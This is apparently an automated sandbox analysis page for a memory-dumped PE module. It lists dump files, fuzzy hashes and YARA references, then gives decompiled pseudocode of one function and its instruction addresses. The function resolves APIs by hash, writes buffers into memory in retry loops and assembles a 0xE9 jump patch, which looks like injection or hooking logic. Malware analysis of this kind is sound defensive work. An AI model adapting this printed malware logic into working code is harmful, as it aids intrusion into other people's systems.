Source File: 00000003.00000002.513214824.0000000072AD1000.00000020.00020000.sdmp, Offset: 72AD0000, based on PE: true

Associated: 00000003.00000002.513203598.0000000072AD0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513326388.0000000072AEA000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.513337524.0000000072AED000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.513396860.0000000072AEF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 6d40ae076e79261059cb96bda7541152fe87c7737d07678b07f5c83c6022cc8d
Instruction ID: d307e1aed4948927871e955f8485d7e0e2c6aef22d2477a019a1ebc72ac290be
Opcode Fuzzy Hash: 6d40ae076e79261059cb96bda7541152fe87c7737d07678b07f5c83c6022cc8d
Instruction Fuzzy Hash: 00F0E972E48101BED2151B7EAC46E36BEDCEFC8B16F94882DB543AA148D6248442C732

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 72AD9144, Relevance: 2.4, Strings: 1, Instructions: 1104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			E72AD9144(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				intOrPtr _v20;
				intOrPtr _v40;
				char _v60;
				intOrPtr _v92;
				void* _v96;
				char _v100;
				char _v104;
				char _v108;
				intOrPtr _v112;
				signed int _v116;
				char _v128;
				intOrPtr _v132;
				void* _v136;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v156;
				char _v160;
				signed int _v164;
				char _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				char _v196;
				void* _v200;
				signed int _v204;
				char _v208;
				char _v212;
				char _v216;
				intOrPtr _v220;
				intOrPtr _v228;
				intOrPtr _v236;
				void* _v268;
				char _v292;
				char _v308;
				char _v316;
				char _v320;
				void* _v324;
				char _v332;
				char _v340;
				void* _v356;
				void* _v360;
				char _v364;
				char _v380;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				intOrPtr _v400;
				signed int _v404;
				char _v408;
				void* _v412;
				char _v416;
				signed int* _v420;
				char _v424;
				char _v428;
				char _v432;
				char _v436;
				intOrPtr _v440;
				signed int* _v444;
				char _v448;
				void* _v452;
				intOrPtr _v460;
				char _v464;
				void* _v468;
				char _v472;
				intOrPtr _v476;
				char _v480;
				void* _v484;
				char _v492;
				char _v496;
				void* _v500;
				char _v508;
				char _v516;
				signed int _v520;
				char _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char _v544;
				void* _v548;
				char _v552;
				char _v556;
				char _v560;
				signed int _v564;
				signed int _v568;
				char _v572;
				char _v576;
				char _v580;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				char _v616;
				char _v620;
				char _v624;
				signed int _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				char _v656;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t437;
				intOrPtr _t442;
				signed int _t444;
				char* _t459;
				char _t534;
				signed int _t544;
				intOrPtr _t546;
				signed int _t550;
				signed int _t556;
				intOrPtr _t561;
				signed int _t567;
				char _t579;
				intOrPtr _t584;
				char _t585;
				intOrPtr _t589;
				char _t590;
				intOrPtr _t594;
				char _t595;
				intOrPtr _t599;
				char _t600;
				intOrPtr _t604;
				char _t605;
				intOrPtr _t609;
				signed int _t622;
				char _t629;
				intOrPtr _t633;
				signed char* _t635;
				signed int _t638;
				intOrPtr _t641;
				signed int* _t647;
				signed int* _t650;
				intOrPtr _t665;
				char* _t806;
				signed int* _t836;
				char* _t837;
				char* _t844;
				void* _t845;
				intOrPtr* _t854;
				signed int* _t856;
				intOrPtr* _t857;
				signed int* _t858;
				signed int* _t860;
				signed int* _t863;
				intOrPtr _t864;
				intOrPtr _t867;
				char _t868;
				signed int _t869;
				intOrPtr* _t872;
				intOrPtr* _t874;
				intOrPtr* _t875;
				intOrPtr* _t876;
				intOrPtr* _t877;
				intOrPtr* _t878;
				signed int* _t881;
				intOrPtr* _t882;
				char* _t907;
				void* _t935;
				char _t950;
				char _t951;
				intOrPtr* _t953;
				void* _t954;
				intOrPtr* _t955;
				void* _t957;

				_t957 = __eflags;
				_t953 =  &_v496;
				_t641 = __edx;
				_v40 = __ecx;
				_t951 =  *((intOrPtr*)(__ecx + 0xc));
				E72AE2F8C(0x23627913, 0xae88daa3);
				_v496 = 0;
				E72ADF620( &_v492, 0);
				_v480 = 0;
				_v476 = 0;
				E72ADF620( &_v472, 0);
				_v528 = 0;
				E72ADF620( &_v524, 0);
				_v392 = 0x4145240a;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x90], xmm0");
				E72ADF8C4( &_v528, E72ADF568( &_v528) + 0x10);
				E72ADF558( &_v532, E72ADF568( &_v532) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v540 = _v540 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v536 + 0x88)) = 0x22dc1034;
				asm("movq [ecx+0x90], xmm0");
				E72ADF8C4( &_v536, E72ADF568( &_v536) + 0x10);
				E72ADF558( &_v540, E72ADF568( &_v540) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v548 = _v548 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v544 + 0x88)) = 0xc06fd820;
				asm("movq [ecx+0x90], xmm0");
				E72ADF8C4( &_v544, E72ADF568( &_v544) + 0x10);
				E72ADF558( &_v548, E72ADF568( &_v548) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v556 = _v556 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v552 + 0x88)) = 0xa54975b2;
				asm("movq [ecx+0x90], xmm0");
				E72ADF8C4( &_v552, E72ADF568( &_v552) + 0x10);
				E72ADF558( &_v556, E72ADF568( &_v556) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v564 = _v564 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v560 + 0x88)) = 0x271e028;
				asm("movq [ecx+0x90], xmm0");
				E72ADF8C4( &_v560, E72ADF568( &_v560) + 0x10);
				E72ADF558( &_v564, E72ADF568( &_v564) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v572 = _v572 + 1;
				asm("pxor xmm0, xmm0");
				( &_v568)[0x22] = 0xf279aa39;
				asm("movq [ecx+0x90], xmm0");
				E72ADF8C4( &_v568, E72ADF568( &_v568) + 0x10);
				E72ADF558( &_v572, E72ADF568( &_v572) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t953 =  *_t953 + 1;
				E72AE413C(0xa5eabdf8, _t953);
				E72ADF558( &_v576, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x4c], xmm0");
				E72ADF558( &_v580, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x54], xmm0");
				E72ADF558( &_v584, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x64], xmm0");
				E72ADF558( &_v588, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x6c], xmm0");
				E72ADF558( &_v592, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x74], xmm0");
				E72ADF558( &_v596, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x7c], xmm0");
				_v584 = _t951;
				E72ADADB8( &_v584,  &_v172, _t957,  &_v192);
				_t889 = _v176;
				_t931 = _v172;
				if((_v176 | _v172) != 0) {
					E72ADB338( &_v308, _t951, __eflags, _t889, _t931);
					E72ADF8DC( &_v516, __eflags);
					_v520 = 0;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v516 + 0x88)) = 0x5889e652;
					asm("movq [eax+0x8], xmm0");
					E72ADF8C4( &_v516, E72ADF568( &_v516) + 0x10);
					E72ADF558( &_v520, E72ADF568( &_v520) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v528 = _v528 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v524 + 0x88)) = 0x1eeb5e35;
					asm("movq [eax+0x8], xmm0");
					E72ADF8C4( &_v524, E72ADF568( &_v524) + 0x10);
					E72ADF558( &_v528, E72ADF568( &_v528) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v536 = _v536 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v532 + 0x88)) = 0xac5d5303;
					asm("movq [eax+0x8], xmm0");
					E72ADF8C4( &_v532, E72ADF568( &_v532) + 0x10);
					E72ADF558( &_v536, E72ADF568( &_v536) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v544 = _v544 + 1;
					_t954 = _t953 + 0xfffffff4;
					asm("movq xmm0, [esp+0x1bc]");
					asm("movq [esp], xmm0");
					_v548 =  &_v544;
					E72ADBAB8( &_v340, __eflags);
					E72ADF558( &_v552, 0);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x5c], xmm0");
					E72ADF558( &_v556, 0x10);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x84], xmm0");
					_t935 = E72ADF558( &_v560, 0x20);
					_v164 =  *((intOrPtr*)(_t935 + 8));
					_v144 =  *((intOrPtr*)(_t935 + 0xc));
					E72ADF620( &_v396, 0);
					E72ADF620( &_v416, 0);
					_push(0);
					_push( *0x72aeb7c4);
					E72AE20A4(__eflags,  &_v100);
					E72ADF75C( &_v416, __eflags);
					E72ADE054( &_v100);
					E72ADF8C4( &_v436, E72ADF744( &_v420,  &_v100));
					_t437 = E72ADF558( &_v424, 0);
					E72AD7970(_t951, _t437, E72ADF558( &_v444, 0), _v112);
					_t442 = E72ADF568( &_v448);
					_v228 = _t442;
					_t101 = _t442 + 2; // 0x2
					_v188 = E72ADB0A4( &_v584, 0x20000000, __eflags, _t101);
					_v236 = 0x20000000;
					_t444 = E72ADB0A4( &_v588, 0x80000000, __eflags, 0x82);
					_v184 = _t444;
					_v204 = 0x80000000;
					__eflags = _t444 | _v204;
					if((_t444 | _v204) == 0) {
						L51:
						E72ADF6F0( &_v380);
						E72ADF6F0( &_v364);
						E72ADF6F0( &_v332);
						goto L1;
					}
					__eflags = _v116 | _v164;
					if((_v116 | _v164) == 0) {
						goto L51;
					}
					E72AE35D4( &_v292, 0, 0x80);
					_t955 = _t954 + 0xc;
					 *((intOrPtr*)( &_v316 + 0x78)) = _v20;
					E72ADCDC0( &_v316, 0);
					_t459 =  &_v320;
					_t854 = _t459 + 0xe8;
					 *_t854 = _t641;
					 *((intOrPtr*)(_t854 - 4)) = _v20;
					_push(_t459);
					E72ADB48C(_t641, _t459 - 0x20, _t854 - 4, _v20, _t951, _t951, _t854 - 4);
					asm("cdq");
					asm("movd xmm1, eax");
					asm("movd xmm0, edx");
					asm("punpckldq xmm1, xmm0");
					asm("movq [esp+0x134], xmm1");
					_v236 = E72ADF568(_v20);
					asm("cdq");
					asm("movd xmm1, eax");
					asm("movd xmm0, edx");
					asm("punpckldq xmm1, xmm0");
					asm("movq [esi+0x8], xmm1");
					_v220 = E72ADF568(_t641);
					asm("cdq");
					asm("movd xmm1, eax");
					asm("movd xmm0, edx");
					asm("punpckldq xmm1, xmm0");
					asm("movq [ebx-0x90], xmm1");
					E72AE3C8C(_t951,  &_v60 - 0x80, __eflags, _v148, _v128, 7,  &_v60);
					_t133 =  &(( &_v564)[0x58]); // 0x160
					_t856 = _t133;
					 *_t856 = _v164;
					_t856[1] = ( &_v564)[0x69];
					E72ADF8DC( &_v564, __eflags);
					_v568 = 0;
					_t746 =  &_v564;
					asm("pxor xmm0, xmm0");
					_t136 = _t746 + 0x88; // 0x88
					 *_t136 = 0x853cdd04;
					asm("movq [eax+0x8], xmm0");
					E72ADF8C4( &_v564, E72ADF568( &_v564) + 0x10);
					E72ADF558( &_v568, E72ADF568( &_v568) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v576 = _v576 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v572 + 0x88)) = 0xb162dc4e;
					asm("movq [eax+0x8], xmm0");
					E72ADF8C4( &_v572, E72ADF568( &_v572) + 0x10);
					E72ADF558( &_v576, E72ADF568( &_v576) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v584 = _v584 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v580 + 0x88)) = 0xc15ccc53;
					asm("movq [eax+0x8], xmm0");
					E72ADF8C4( &_v580, E72ADF568( &_v580) + 0x10);
					E72ADF558( &_v584, E72ADF568( &_v584) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v592 = _v592 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v588 + 0x88)) = 0x73f8f999;
					asm("movq [eax+0x8], xmm0");
					E72ADF8C4( &_v588, E72ADF568( &_v588) + 0x10);
					E72ADF558( &_v592, E72ADF568( &_v592) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v600 = _v600 + 1;
					_t762 =  &_v596;
					asm("pxor xmm0, xmm0");
					_t160 = _t762 + 0x88; // 0xa8
					 *_t160 = 0x4145240a;
					asm("movq [eax+0x8], xmm0");
					E72ADF8C4( &_v596, E72ADF568( &_v596) + 0x10);
					E72ADF558( &_v600, E72ADF568( &_v600) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v608 = _v608 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v604 + 0x88)) = 0xf06b4c6b;
					asm("movq [eax+0x8], xmm0");
					E72ADF8C4( &_v604, E72ADF568( &_v604) + 0x10);
					E72ADF558( &_v608, E72ADF568( &_v608) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v616 = _v616 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v612 + 0x88)) = 0x7d07f92f;
					asm("movq [eax+0x8], xmm0");
					E72ADF8C4( &_v612, E72ADF568( &_v612) + 0x10);
					E72ADF558( &_v616, E72ADF568( &_v616) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v624 = _v624 + 1;
					asm("pxor xmm0, xmm0");
					 *((intOrPtr*)( &_v620 + 0x88)) = 0x2c2324e8;
					asm("movq [eax+0x8], xmm0");
					E72ADF8C4( &_v620, E72ADF568( &_v620) + 0x10);
					E72ADF558( &_v624, E72ADF568( &_v624) + 0xfffffff0);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t857 = _t955;
					 *_t857 =  *_t857 + 1;
					E72AE413C(0xa5eabdf8, _t857);
					E72ADF558( &_v628, 0);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0xf4], xmm0");
					E72ADF558( &_v632, 0x10);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0xfc], xmm0");
					E72ADF558( &_v636, 0x20);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x104], xmm0");
					E72ADF558( &_v640, 0x30);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x10c], xmm0");
					E72ADF558( &_v644, 0x40);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x114], xmm0");
					E72ADF558( &_v648, 0x50);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x11c], xmm0");
					E72ADF558( &_v652, 0x60);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x124], xmm0");
					E72ADF558( &_v656, 0x70);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [ecx+0x118], xmm0");
					_t534 = E72ADA5A4( &_v644, __eflags);
					_v524 = _t857;
					_t950 = _t534;
					__eflags = _t950 - 0xffffffffffffffff | _t857 - 0xffffffffffffffff;
					if((_t950 - 0xffffffffffffffff | _t857 - 0xffffffffffffffff) == 0) {
						L50:
						E72ADB608(_t955 + 0xbc);
						E72ADCDE0( &_v320, __eflags);
						goto L51;
					}
					_t858 =  &_v128;
					__eflags =  *_t858 | _t858[1];
					if(( *_t858 | _t858[1]) != 0) {
						L18:
						_v396 = 0;
						while(1) {
							__eflags = E72ADAD68(0x80, _t950, _v400, _v112, _v132);
							if(__eflags != 0) {
								break;
							}
							_t605 = E72ADA5A4( &_v520, __eflags);
							_v400 = 0x80;
							_t950 = _t605;
							__eflags = _t950 - 0xffffffffffffffff | 0x81;
							if((_t950 - 0xffffffffffffffff | 0x81) == 0) {
								goto L50;
							}
							_t878 =  &_v396;
							_t609 =  *_t878 + 1;
							 *_t878 = _t609;
							__eflags = _t609 - 0xa;
							if(_t609 != 0xa) {
								continue;
							}
							goto L50;
						}
						_v396 = 0;
						while(1) {
							_push(0x80);
							_push(_v132);
							_push(_v112);
							_push(_v400);
							_push(_t950);
							_t860 =  &(( &_v520)[0x38]);
							__eflags = E72ADA298( &_v520, _t860);
							if(__eflags != 0) {
								break;
							}
							_t600 = E72ADA5A4( &_v540, __eflags);
							_v420 = _t860;
							_t950 = _t600;
							__eflags = _t950 - 0xffffffffffffffff | _t860 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t860 - 0xffffffffffffffff) == 0) {
								goto L50;
							}
							_t877 =  &_v416;
							_t604 =  *_t877 + 1;
							 *_t877 = _t604;
							__eflags = _t604 - 0xa;
							if(_t604 != 0xa) {
								continue;
							}
							goto L50;
						}
						asm("cdq");
						asm("movd xmm1, eax");
						_v416 =  *((intOrPtr*)(_t955 + 0x1a4));
						_t647 =  &_v408;
						asm("movd xmm0, edx");
						asm("punpckldq xmm1, xmm0");
						 *_t647 = 0;
						 *((intOrPtr*)(_t647 - 4)) = _v188;
						asm("movq [edx], xmm1");
						_t544 = E72AE3BA0(_t951, _t647 - 8, __eflags,  &(_t647[0x48]), 0x40, _t647);
						__eflags = _t544;
						if(_t544 != 0) {
							goto L50;
						}
						_v180 = 0;
						while(1) {
							_t863 = _v184;
							__eflags = E72ADAD68(_t863, _t950, _v420,  *((intOrPtr*)(_t955 + 0x1a8)), _v188);
							if(__eflags != 0) {
								break;
							}
							_t595 = E72ADA5A4( &_v540, __eflags);
							_v420 = _t863;
							_t950 = _t595;
							__eflags = _t950 - 0xffffffffffffffff | _t863 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t863 - 0xffffffffffffffff) == 0) {
								goto L50;
							}
							_t876 =  &_v180;
							_t599 =  *_t876 + 1;
							 *_t876 = _t599;
							__eflags = _t599 - 0xa;
							if(_t599 != 0xa) {
								continue;
							}
							goto L50;
						}
						_v184 = 0;
						while(1) {
							_t546 = E72ADF558( &_v404, 0);
							_push(E72ADF568( &_v408));
							_push(_v192);
							_push(_v144);
							_push(_v424);
							_push(_t950);
							_t864 = _t546;
							__eflags = E72ADA298( &_v544, _t864);
							if(__eflags != 0) {
								break;
							}
							_t590 = E72ADA5A4( &_v560, __eflags);
							_v440 = _t864;
							_t950 = _t590;
							__eflags = _t950 - 0xffffffffffffffff | _t864 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t864 - 0xffffffffffffffff) == 0) {
								goto L50;
							}
							_t875 =  &_v204;
							_t594 =  *_t875 + 1;
							 *_t875 = _t594;
							__eflags = _t594 - 0xa;
							if(_t594 != 0xa) {
								continue;
							}
							goto L50;
						}
						_t550 = E72AE3BA0(_t951,  &_v428 - 8, __eflags,  &_v428 + 0x120, _v428,  &_v428);
						__eflags = _t550;
						if(_t550 != 0) {
							goto L50;
						}
						E72ADF620( &_v208, 0);
						_v100 = 0xe9;
						E72ADF578( &_v100 - 0x70, __eflags,  &_v100, 1);
						_t650 =  &_v104;
						_t556 = _v172 -  *((intOrPtr*)(_t650 - 0x54)) + 0xfffffffb;
						__eflags = _t556;
						 *_t650 = _t556;
						E72ADF578(_t650 - 0x74, __eflags, _t650, 4);
						_t907 =  &_v448;
						asm("movq xmm0, [0x72aeb798]");
						 *((intOrPtr*)(_t907 - 8)) = _v196;
						 *((intOrPtr*)(_t907 - 4)) =  *((intOrPtr*)(_t907 + 0x110));
						asm("movq [ebx], xmm0");
						E72AE3BA0(_t951, _t907 + 0x120 - 0x128, __eflags, _t907 + 0x120, 0x40, _t907);
						_v192 = 0;
						while(1) {
							_t561 = E72ADF558( &_v208, 0);
							_push(E72ADF568( &_v212));
							_push(_v160);
							_push(_v180);
							_push(_v444);
							_push(_t950);
							_t867 = _t561;
							__eflags = E72ADA298( &_v564, _t867);
							if(__eflags != 0) {
								break;
							}
							_t585 = E72ADA5A4( &_v580, __eflags);
							_v460 = _t867;
							_t950 = _t585;
							__eflags = _t950 - 0xffffffffffffffff | _t867 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t867 - 0xffffffffffffffff) == 0) {
								L49:
								E72ADF6F0(_t955 + 0x174);
								goto L50;
							}
							_t874 =  &_v180;
							_t589 =  *_t874 + 1;
							 *_t874 = _t589;
							__eflags = _t589 - 0xa;
							if(_t589 != 0xa) {
								continue;
							}
							goto L49;
						}
						_v180 = 0;
						while(1) {
							_t955 = _t955 + 0xffffffd8;
							asm("pxor xmm0, xmm0");
							_v640 = _t950;
							_v636 = _v460;
							_t868 = _v196;
							_v632 = _t868;
							_v628 = _v176;
							_t806 =  &_v580;
							_v624 =  *((intOrPtr*)(_t806 + 0x198));
							_v620 =  *((intOrPtr*)(_t806 + 0x184));
							asm("movq [esp+0x18], xmm0");
							asm("movq [esp+0x20], xmm0");
							__eflags = E72ADAD04(__eflags);
							if(__eflags != 0) {
								break;
							}
							_t579 = E72ADA5A4( &_v616, __eflags);
							_v496 = _t868;
							_t950 = _t579;
							__eflags = _t950 - 0xffffffffffffffff | _t868 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t868 - 0xffffffffffffffff) == 0) {
								goto L49;
							}
							_t872 =  &_v216;
							_t584 =  *_t872 + 1;
							 *_t872 = _t584;
							__eflags = _t584 - 0xa;
							if(__eflags != 0) {
								continue;
							}
							goto L49;
						}
						_push(0);
						_t869 = _v164;
						__eflags = _t869;
						_t870 =  !=  ? _t869 + 0xc : _t869;
						_push( !=  ? _t869 + 0xc : _t869);
						_t567 = E72ADC3A8(_t869,  &_v416, 0x2710);
						E72ADF6F0(_t955 + 0x184);
						E72ADB608( &_v448);
						E72ADCDE0( &_v416, __eflags);
						E72ADF6F0( &_v480);
						E72ADF6F0( &_v464);
						E72ADF6F0( &_v432);
						E72ADF6F0( &_v632);
						E72ADB680( &_v592);
						E72ADF6F0( &_v608);
						__eflags = _t567;
						return 0 | _t567 == 0x00000000;
					}
					_v388 = 0;
					do {
						E72ADF620(_t955 + 0x188, 0);
						_push(0x23627913);
						_push(_t955 + 0x1cc);
						E72AE1D00();
						E72ADDD7C(_t955 + 0x1d0 - 8, _t955 + 0x1d0);
						_t879 = 0x7fffffff;
						E72ADF578( &_v168, __eflags, _v92, E72ADE94C(_v92, 0x7fffffff));
						E72ADE054( &_v100);
						E72ADD098( &_v108);
						_t836 =  &_v176;
						_t665 =  *((intOrPtr*)(_t836 + 0x28));
						 *((intOrPtr*)(_t836 - 0xf0)) = _v156;
						__eflags = E72ADF568(_t836);
						if(__eflags <= 0) {
							L12:
							_t955 = _t955 + 0xffffffd8;
							asm("movq xmm0, [esp+0xac]");
							asm("pxor xmm1, xmm1");
							_t837 =  &_v528;
							_v588 = _t950;
							_v584 =  *((intOrPtr*)(_t837 + 0x78));
							asm("movq [esp+0x8], xmm0");
							_v572 =  *((intOrPtr*)(_t837 + 0x198));
							_v568 =  *((intOrPtr*)(_t837 + 0x184));
							asm("movq [esp+0x18], xmm1");
							asm("movq [esp+0x20], xmm1");
							_t622 = E72ADAD04(__eflags);
							__eflags = _t622;
							if(_t622 != 0) {
								E72AE218C(0x3e8, _t879, _t950);
								E72ADF6F0( &_v196);
								E72ADADB8( &_v564,  &(( &_v172)[5]), __eflags,  &_v172);
								_t881 =  &_v176;
								__eflags =  *_t881 | _t881[1];
								if(__eflags != 0) {
									goto L18;
								}
								_t629 = E72ADA5A4( &_v564, __eflags);
								_v444 = _t881;
								_t950 = _t629;
								__eflags = _t950 - 0xffffffffffffffff | _t881 - 0xffffffffffffffff;
								if((_t950 - 0xffffffffffffffff | _t881 - 0xffffffffffffffff) == 0) {
									goto L50;
								}
								goto L16;
							}
							L13:
							E72ADF6F0( &_v196);
							goto L50;
						}
						_v404 = 0;
						while(1) {
							_t635 = E72ADF558( &_v160, _v404);
							_t879 = _t635;
							_t955 = _t955 + 0xffffffd8;
							asm("movq xmm0, [esp+0x94]");
							_t844 =  &_v532;
							asm("movq xmm1, [0x72aeb790]");
							_v592 = _t950;
							_v588 =  *((intOrPtr*)(_t844 + 0x78));
							asm("movq [esp+0x8], xmm0");
							_v576 = _t665;
							_v572 =  *((intOrPtr*)(_t844 + 0x80));
							_v568 =  *_t635 & 0x000000ff;
							_v564 = 0;
							asm("movq [esp+0x20], xmm1");
							_t638 = E72ADAD04(__eflags);
							__eflags = _t638;
							if(_t638 == 0) {
								goto L13;
							}
							_t845 = 0x64;
							E72AE218C(_t845, _t879, _t950);
							_t665 = _t665 + 1;
							asm("adc dword [ecx-0xf0], 0x0");
							 *((intOrPtr*)( &_v196 - 0xf4)) =  *((intOrPtr*)( &_v196 - 0xf4)) + 1;
							__eflags = E72ADF568( &_v196) - _v440;
							if(__eflags > 0) {
								continue;
							}
							goto L12;
						}
						goto L13;
						L16:
						_t882 =  &_v432;
						_t633 =  *_t882 + 1;
						 *_t882 = _t633;
						__eflags = _t633 - 0xa;
					} while (_t633 != 0xa);
					goto L50;
				}
				L1:
				E72ADF6F0( &_v532);
				E72ADB680( &_v492);
				E72ADF6F0( &_v508);
				return 0;
			}

0x72ad9144
0x72ad9148
0x72ad914e
0x72ad9150
0x72ad9161
0x72ad9164
0x72ad916b
0x72ad9174
0x72ad917b
0x72ad917f
0x72ad9188
0x72ad918f
0x72ad9197
0x72ad919c
0x72ad91ab
0x72ad91af
0x72ad91c4
0x72ad91da
0x72ad91e8
0x72ad91e9
0x72ad91ea
0x72ad91eb
0x72ad91ec
0x72ad91f3
0x72ad91f7
0x72ad9201
0x72ad9216
0x72ad922c
0x72ad923a
0x72ad923b
0x72ad923c
0x72ad923d
0x72ad923e
0x72ad9245
0x72ad9249
0x72ad9253
0x72ad9268
0x72ad927e
0x72ad928c
0x72ad928d
0x72ad928e
0x72ad928f
0x72ad9290
0x72ad9297
0x72ad929b
0x72ad92a5
0x72ad92ba
0x72ad92d0
0x72ad92de
0x72ad92df
0x72ad92e0
0x72ad92e1
0x72ad92e2
0x72ad92e9
0x72ad92ed
0x72ad92f7
0x72ad930c
0x72ad9322
0x72ad9330
0x72ad9331
0x72ad9332
0x72ad9333
0x72ad9334
0x72ad933b
0x72ad933f
0x72ad9349
0x72ad935e
0x72ad9374
0x72ad9382
0x72ad9383
0x72ad9384
0x72ad9385
0x72ad938e
0x72ad9390
0x72ad939b
0x72ad93a0
0x72ad93a5
0x72ad93b1
0x72ad93b6
0x72ad93bb
0x72ad93c7
0x72ad93cc
0x72ad93d1
0x72ad93dd
0x72ad93e2
0x72ad93e7
0x72ad93f3
0x72ad93f8
0x72ad93fd
0x72ad9409
0x72ad940e
0x72ad941a
0x72ad9420
0x72ad9430
0x72ad9435
0x72ad943e
0x72ad9447
0x72ad947e
0x72ad9487
0x72ad948c
0x72ad9497
0x72ad94a1
0x72ad94a7
0x72ad94b9
0x72ad94cf
0x72ad94dd
0x72ad94de
0x72ad94df
0x72ad94e0
0x72ad94e1
0x72ad94e8
0x72ad94f2
0x72ad94f8
0x72ad950a
0x72ad9520
0x72ad952e
0x72ad952f
0x72ad9530
0x72ad9531
0x72ad9532
0x72ad9539
0x72ad9543
0x72ad9549
0x72ad955b
0x72ad9571
0x72ad957f
0x72ad9580
0x72ad9581
0x72ad9582
0x72ad9583
0x72ad9586
0x72ad9589
0x72ad959f
0x72ad95a4
0x72ad95a8
0x72ad95b3
0x72ad95b8
0x72ad95bd
0x72ad95c9
0x72ad95ce
0x72ad95d3
0x72ad95e7
0x72ad95ef
0x72ad95f6
0x72ad9606
0x72ad9614
0x72ad9620
0x72ad9622
0x72ad9629
0x72ad963c
0x72ad9643
0x72ad965c
0x72ad966a
0x72ad9681
0x72ad968f
0x72ad9694
0x72ad96a0
0x72ad96ad
0x72ad96b4
0x72ad96c9
0x72ad96ce
0x72ad96d5
0x72ad96dc
0x72ad96e3
0x72ada1d7
0x72ada1de
0x72ada1ea
0x72ada1f6
0x00000000
0x72ada1f6
0x72ad96f0
0x72ad96f7
0x00000000
0x00000000
0x72ad970c
0x72ad9711
0x72ad9722
0x72ad9727
0x72ad9733
0x72ad973a
0x72ad9740
0x72ad9745
0x72ad9748
0x72ad974e
0x72ad975c
0x72ad975d
0x72ad9761
0x72ad9765
0x72ad9769
0x72ad977e
0x72ad9789
0x72ad978a
0x72ad978e
0x72ad9792
0x72ad9796
0x72ad97a0
0x72ad97b6
0x72ad97b7
0x72ad97bb
0x72ad97bf
0x72ad97c3
0x72ad97df
0x72ad97f5
0x72ad97f5
